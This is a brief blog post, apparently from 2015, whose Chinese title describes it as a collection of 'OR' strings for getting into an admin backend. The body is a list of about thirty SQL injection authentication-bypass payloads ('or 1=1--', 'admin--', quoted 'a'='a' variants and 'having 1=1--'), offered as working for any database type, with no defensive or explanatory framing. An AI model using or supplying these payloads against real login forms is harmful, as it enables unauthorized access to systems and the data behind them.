老外OR进后台的集锦

SQL injection strings(DB type doesnt matter)

) OR (a = a 
) OR (1-1 
or= 
OR 1=1 
admin-- 
or 0=0 -- 
" or 0=0 -- 
or 0=0 -- 
or 0=0 # 
" or 0=0 # 
or 0=0 # 
or x=x 
" or "x"="x 
) or (x=x 
or 1=1-- 
" or 1=1-- 
or 1=1-- 
or a=a-- 
" or "a"="a 
) or (a=a 
") or ("a"="a 
hi" or "a"="a 
hi" or 1=1 -- 
hi or 1=1 -- 
hi or a=a 
hi) or (a=a 
hi") or ("a"="a 
or 1=1-- 
or a=a-- 
or 1=1-- 
1 having 1=1-- 
or x=x-- 
foo+OR+1=1 
having 1=1--

 

posted @ 2015-02-14 12:10  hwk603  阅读(330)  评论(0编辑  收藏  举报